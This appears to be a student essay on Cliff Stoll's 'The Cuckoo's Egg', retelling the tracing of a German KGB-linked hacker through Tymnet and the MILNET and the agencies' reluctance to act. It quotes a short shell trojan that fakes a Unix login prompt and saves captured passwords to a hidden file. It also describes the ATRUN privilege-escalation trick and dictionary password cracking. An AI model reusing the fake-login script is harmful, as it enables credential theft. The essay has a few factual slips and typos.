Introduction – Ghosts In The Machine
In his book the Cuckoo’s Egg, Cliff Stoll discovers a 75 cent computer use accounting error which begins a journey that ultimately reveals a hidden network of multinational hackers linked to the KGB. This accounting error tips Stoll off to an uninvited visitor to the Lawrence Berkeley Lab computers. The trail goes through Hanover, Germany and the Project Equalizer plot. Project Equalizer was an initiative by the KGB to pay the West German Chaos Computer Club members to hack into United States military computers. [2] These groups were exploiting security vulnerabilities in government funded research labs, and military weapons research facilities.
50 miles away from Berkeley, The Lawrence Livermore Lab performed classified nuclear weapons design and Star Wars project research, but was protected from brute force by isolation. This however wouldn’t protect other computer systems that were connected to a global network of interconnections. By systematically enumerating computer systems all over Europe, North America, and Japan, Mark Hess, a West German hacker, attempted to break into over 400 computer sites on the Milnet and Arpanet. He was successful in about 40 of his attempts before finally being brought to justice by the German BKA (the German equivalent of the FBI). [4]
Section 1 – Data Network Primer – Global Connections
Today’s modern day Internet has become a tremendous tool for communication, thought exchange & a provision for electronic commerce. Each day billions of dollars are traded through international banking cartels, sensitive medical records are relayed to awaiting rescue teams, and top secret documents are reviewed by military commanders in preparation for war. Often these transactions go on “behind the scenes” and auditing them was not valued as a priority. This information traverses the globe along groups of paired wires, or ultra high speed flashes of light through glass
fibers, or even beamed off satellites using microwave energy.
Public Switched Telephone Networks or PSTNs were originally designed as a network of fixed-line analog telephone systems, they were used for voice communications purposes for decades. [5] When the data modem was introduced, it provided a way for analog to digital signal conversion making these telephone lines communication channels for computer systems all over the world. The original modems were cost prohibitive and only large corporations, universities, and government organizations could afford them. As the cost of these original modems came down it made them available to a larger section of the population.
These modems can be used to connect via a local telephone call to a number of larger private telephone networks. These private networks are often provided and supported by military or academic concerns and are not directly connected to the Public Network. There are also private networks run by large companies which are linked to the Public Network only through limited gateways, like a large private branch exchange system. Originally voice connections were made through manual switchboards, but later automated digital switch technologies were implemented. Most connections use digital circuits between exchanges, with analog voice circuits used to connect telephones over “the last mile” of service.
The basic digital circuit in the PSTN is a 64-kilobit-per-second channel, originally designed by Bell labs. To carry a typical call from calling party to calling party, the audio sound is digitized. The call is then transmitted from one end to another via telephone exchanges. In recent years digital services have been rolled out to “customers” using services such as DSL (Digital Subscriber Line), ISDN (Integrated Services Digital Network), and cable systems. Many observers believe that the PSTN will become just one application of the growing Internet as VoIP (Voice over Internet Protocol) technology is improved [5].
Threats can now originate from anywhere on the globe and traverse multiple circuit switched and packet switched
networks to eventually land in your local neighborhood community. Stoll illustrates this concept when trying to track his hacker through the maze of communication networks [Cuckoo Egg pg. 95]:
Once the hacker arrived on the MILNET (Military Network) he could then sneak into Livermore, SRI, Anniston, and MIT completely unrestricted. [Cuckoo Egg pg. 110]
Stoll also demonstrates this in his statement:
“From MITRE, the hacker had made long-distance connections to Norfolk, Oak Ridge, Omaha, San Diego, Pasedena, Livermore, and Atlanta. At least as interesting: He made hundreds of one-minute long phone calls, all across the country, to Air Force bases, Navy shipyards, aircraft builders, and defense contractors.” [Cuckoo’s Egg pg. 156]
Section 2 – Intrusion Detection Techniques – Authenticating A Trace
Stoll is a graduate level astronomer who had a basic knowledge of Unix computers and a limited knowledge of hacking techniques and programming practices. By trial and error and sometimes by complete accident he discovers bugs in software, unrestricted computer network access, and system accounts that are compromised by weak passwords or no passwords at all. The hacker was first recognized as logging onto Stoll’s Unix 4 & 5 systems under the User ID of Sventek. Instead of locking out the account used by the unauthorized hacker, he methodically keeps a record in a log book of the hacker’s activity. He discovers that a few of his 1200-baud lines were dial-in modems and were connected to Tymnet.
Tymnet is a communication backbone network that allows subscribers to connect to anyone in the whole country by making a local phone call. Stoll devises a monitoring system of makeshift 1200-baud Decwriter printers and saves every keystroke of the hacker to paper printouts. [Cuckoo’s Egg pg. 26]
This clever idea also provided a running logged of the time and date of all of the hackers actions. This would aid in prosecution once he was caught. Stoll also discovers that the hacker sneaked through a hole in security by laying a “cuckoo’s egg” program in the Unix system. The system would hatch the egg and feed the hackers un-privileged account super-user rights. It was accomplished by substituting a bogus ATRUN program which runs in privileged super-user mode, every 5 minutes.
Once the bogus ATRUN program ran, it would elevate the users basic privileges to have super-user privileges and full control over the machine. The substitution of the bogus ATRUN program was accomplished by exploiting a software bug in a editing & email delivery program called Gnu-Emacs. The bug would allow files to be sent to any user on the system regardless of rights. Any program could be sent to another user with higher privileges without authenticating the sender. When the bogus ATRUN program was sent to the system manager account and run it elevated the hackers priveledges to super-user. Stoll illustrates this:
“As Super-User, he had the run of our system. First thing he did was to erase his tracks: He switched the good copy od the ATRUN back where it belonged. He then listed the email of all of our users. He searched for changes in system manager files, and discovered I had just started work. He checked my salary and resume. Every 10 minutes he issued the command “who” to list everyone logged onto the computer. He also scanned everyone email messages for the word, “hacker”, and “security”.” [Cuckoo’s Egg pg.30]
Stoll also uses correlation analysis software to analyze MITRE long-distance bill data he entered into his Macintosh computer. He gave it the criteria to find all calls that immediately proceeded or trailed calls made to Anniston Army base. The results of this analysis confirmed that the hacker had broken into 6 to 12 other computers.
Using Kermit to transfer the files, the hacker had installed a small trojan horse program (Stoll calls it a mockingbird program – a false program that sounded like the real thing) to capture passwords:
Echo –n “Welcome to the LBL Unix-4 Computer”
Echo –n “Please Log In Now”
Echo –n “LOGIN:”
Read account_name
Echo –n “Enter Your Password:”
(stty –echo; \
Read password; \
Stty echo;\
Echo ” “; \
Echo $account_name $password >> /tmp/.pub)
Echo “Sorry, Try Again”
[Cuckoo’s Egg pg. 55]
This short program would capture a users’ password to a temporary file. The hacker had written it for an AT&T Unix machine. It did not install correctly for a Berkeley Unix machine. This was also an indication that the hacker wasn’t familiar with Berkeley Unix and was possibly not from the West Coast.
In is pursuit, Stoll enlists the aid of Lee Cheng of PAC-BELL and Ed Sell at AT&T in New Jersey to trace the telephone lines.
“When a technician engages in a telephone trace, he logs into the control computer over an ESS maintenance channel. Line conditioning software is used to display the lines status (busy, idle, off-hook). He then executes programs to show where the connection came from (routing index, trunk group number, adjacent exchange name).” [Cuckoo’s Egg pg. 60]
Stoll discovers that the hacker is calling from a European country when Ron Vivier at TYMNET traces a call to an ITT IRC (International Record Carrier). The call is traced to the Westar-3 satellite that relays microwave signals between Europe and America. Steve White, with TYMNET’s transatlantic department, troubleshot TYMNET virtual circuits using switching computers or nodes. There were no wires to trace, only a thread of addresses between the hackers’ computer and Stolls’ at Berkeley. This eventually led to the hacker being traced by the German Bundespost to cities in Bremen and Hannover, Germany.
Stoll also created a real time alert system to call a pocket pager and tell him when the hacker had logged on. He wrote a program to page him, and beep in morse code indicating the account that the hacker was using.
“I’d know within seconds of the hacker’s arrival. I’d become an extension of my computer” [Cuckoo Egg pg. 129]
Stoll also created a “honey pot” towards the end of the book. This was a fake secretary, managing a fake classified Star Wars project called SDINET. Stoll recounts:
“Give the guy what he’s looking for. Create some files of phony information, laced with bogus secret documents. Leave ‘em lying around my computer. The hacker stumbles on them, and then spends a couple of hours lapping it up, copying it all.” [Cuckoo’s Egg. Pg. 256]
He invented a secretary named Barbara Sherwin who was the administrator of the falsely created “Strategic Defense Initiative Network Office”. His fake memoranda included fake budget requests, purchase orders, and technical descriptions of the new network. A copy of the lab’s news letter list was used.
“I just flipped every “Mr.” to “Lieutenant,” every “Mrs.” to “Captain,” every “Dr.” to “Colonel,” and every “Professor” to “General” [Cuckoo’s Egg pg 259]
Stoll also created a form letter for anyone who wanted more information on the SDINET project to request info. Amazingly the hacker used the form letter and request information be sent to a contact named Lazlo J. Balough, in Pittsburg, Pennsylvania.
The hacker Also broke into the Butterfly VAX computer at BBN (Bolt, Beranak, & Newman in Cambridge, Massachusetts). He discovered that the root account needed no password. This computer was particularly sensitive and was where BBN developed the military’s network software.
“The place to booby-trap software is where it is distributed. Slip a logic bomb into the development software; it’ll be copied along with the valid programs and shipped to the rest of the country. A year late, your treacherous code will infest hundreds of computers.” [Cuckoo’s Egg, pg. 286]
Stoll also discovered that the hacker was using brute force password cracking by encrypting every word in the English dictionary and comparing it to the stolen password files encrypted hashes. Stoll deduced that the hacker must have cracked the passwords using a password cracker on a VAX or a Sun workstation due to the speed at which he cracked them in about three weeks.
“A hundred thousand [English] words in the dictionary, would take around a day on a VAX. On an IBM PC, maybe a month. A Cray supercomputer would take around an hour.” [Cuckoo’s Egg, pg 306]
Stoll contacted the FBI, the CIA, the Air Force Office of Special Investigation, and even the NSA in his pursuit of the case. He faced resistance every step of the way by the authorities. No one wanted to be accountable for the effort. The FBI consistently dismissed the case because there wasn’t any evidence of serious financial damage. The FBI required actual damages of a million dollars or more to officially open a case. There wasn’t a way to place a value on just looking at research documents.
The FBI often questioned Stoll’s intentions, and suggested that he drop his pursuit, even when the German BKA (Germany’s version of the FBI) headed by Wolfgang Hoffman, was involved. Only when his own employer the DOE (Department of Energy) got involved was Stoll granted the rights to continue the search for the hacker. The CIA would not get involved because it was a domestic matter, and they were only allowed to get involved in foreign operations. Even Zeke Hanson, of the NCSC (National Computer Security Center), a subsidiary of the NSA (National Security Administration) couldn’t touch it because their charter only allowed for foreign surveillance. These agencies also seem to only be interested in collecting information and not on providing information of any value.
Since this occurred in the late 80s, it was pre-Patriot Act and didn’t provide for good communication between intelligence agencies. The need for wire tap warrants that took weeks if ever granted, also helped the hacker continue breaking into computer systems. The Air Force OSI became very interested in who was perusing through their data, but didn’t have the jurisdiction to investigate civilian or academic institutions.
Then there was the Mitre Corporation, a military contractor who designed secure computing systems for the government. Bill Chandler adamantly proclaimed that their systems were highly secure and there was no way for anyone to hack through their networks. Only after Stoll revealed that Mitre’s outgoing modem banks were being compromised by the hacker, were they finally shut down. The hacker could still enter Mitre’s local network, but could no longer exit through their long-distance dial-out modems. MITRE now thought they were safe.
Conclusion – To Catch A Variment
The Hannover Police finally exercized a search warrant on the office of a small computer firm and the apartment of one of their employees on June 29, 1987. Stoll was officially told to close up his search and he began to distill all 125 pages of logged notes into a more concise scientific paper. His quest had continued for a year, in which time he had written dozens of programs, mingled with the FBI, NSA, OSI, and the CIA, while making several coast to coast flights.
He gave talks at the NSA’s X-1 Department (Theoretical software testers for designing secure computers). Markus Hess, Karl Koch, and Hans Huebner were in a group that was selling secret documents to the Russian KGB in exchange for money and cocaine. They were loosely associated with the Chaos Computer Club but, were never directly connected. Printouts and passwords were sold for around $18,000. They also sold their techniques as well: How to break into VAX computers; which networks to use when crossing the Atlantic; details on how the MILNET operates.
The KGB also was obtaining research data about integrated circuit design, computer aided manufacturing, and especially operating system software that was under US export control. Hess got off on appeal at his first trial since he wasn’t at his apartment during the police raid. His attorney argued that no one could prove that he was the one doing the hacking. Hagbard was last seen alive on May 23, 1989. Police found his charred bones next to a melted can of gasoline.
Bibliography
[1] Stoll, Cliff. The Cuckoo Egg. New York: Simon & Schuster, Inc., 1989
[2] Kevin Mandia, Chris Propise, Matt Pepe. Incident Response & Computer Forensics. California: McGraw-Hill / Osborne., 2003
[3] Special Circumstances, Anoop Sarkar, The Cuckoo’s Egg Aug 24, 2004
http://www.cs.sfu.ca/~anoop/weblog/archives/000052.html
[4] The Computer Lab StreetTech. Gar & Pete’s Tech review site. Cuckoo’s Egg
http://www.streettech.com/bcp/BCPgraf/StreetTech/cuckoo.htm
[5] Wikipedia. Public Switched Telephone Network.
http://en.wikipedia.org/wiki/PSTN
|
